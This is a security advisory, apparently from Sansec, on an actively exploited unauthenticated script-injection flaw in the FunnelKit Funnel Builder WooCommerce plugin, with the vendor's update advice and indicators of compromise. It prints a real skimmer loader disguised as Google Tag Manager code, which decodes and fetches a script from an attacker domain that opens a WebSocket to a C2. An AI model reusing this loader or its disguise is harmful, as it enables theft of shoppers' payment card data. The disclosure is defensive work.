Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts

Sansec is tracking active attacks against Funnel Builder by FunnelKit, a checkout and upsell plugin used on 40,000+ WooCommerce stores. All versions before 3.15.0.3 let unauthenticated attackers inject arbitrary JavaScript into every checkout page on the store.

Attackers are planting fake Google Tag Manager scripts into the plugin's "External Scripts" setting. The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout.

FunnelKit has shipped a patched version and is asking all customers to update.

The vulnerability

Funnel Builder includes a public checkout endpoint that lets the request pick which internal method to run. Older releases never check the caller's permissions or restrict which methods are allowed.

An unauthenticated request can therefore reach the internal method that writes attacker-controlled data straight into the plugin's global settings. Whatever sits in the "External Scripts" setting then gets printed onto every Funnel Builder checkout page, so an attacker can plant a <script> tag that runs on every checkout transaction across the site.

The patch adds the missing capability check and locks the endpoint down to an allow-list of safe methods. Patch details are in the changeset on WordPress.org.

Observed exploitation

In at least one case, Sansec found a payload posing as a Google Tag Manager loader, sitting next to the store's legitimate marketing tags:

(function (i, s, o, g, r) {
  window.addEventListener("load", function () {
    a = s.createElement(o);
    a.async = 1;
    a.src = atob(r);
    s.body.appendChild(a);
  });
})(window, document, "script", "www.google-analytics.com/analytics.js", "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM=");

On page load, the script decodes the base64 string at the end and loads it as an external script: https://analytics-reports[.]com/wss/jquery-lib.js.

That loader opens a WebSocket to the attacker's C2 at wss://protect-wss[.]com/ws, which streams back a skimmer tailored to the victim store. The skimmer steals credit card numbers, CVVs, billing addresses and other personal details at checkout.

Dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern, since reviewers tend to skim straight past anything that looks like a familiar tracking tag.

What to do

FunnelKit's own advisory to customers reads:

We've just released an important security update for Funnel Builder 3.15.0.3 that needs to be updated on your site. We identified an issue that allowed bad actors to inject scripts.

As a precaution, we'd recommend two quick steps:

1. Update FunnelKit plugins to the latest version from your WordPress dashboard.
2. Take a moment to review your Settings > Checkout > External Scripts (or other script settings) & remove any script that looks unfamiliar.

On top of FunnelKit's advice, run eComscan. It detects this skimmer along with other malware, backdoors and vulnerabilities that may already be on your store.

Indicators of Compromise

analytics-reports[.]com/wss/jquery-lib.js
wss://protect-wss[.]com/ws

Read more

• Malware Persistence via Telegram and GitHub
• Bad extensions now main source of Magento hacks: a solution!
• Unpublished security flaws (0days) massively exploited
• ClickFix malware hits DoD cybersecurity vendor homepage
• SVG Onload Tag Hides Magecart Skimmer on 99 Stores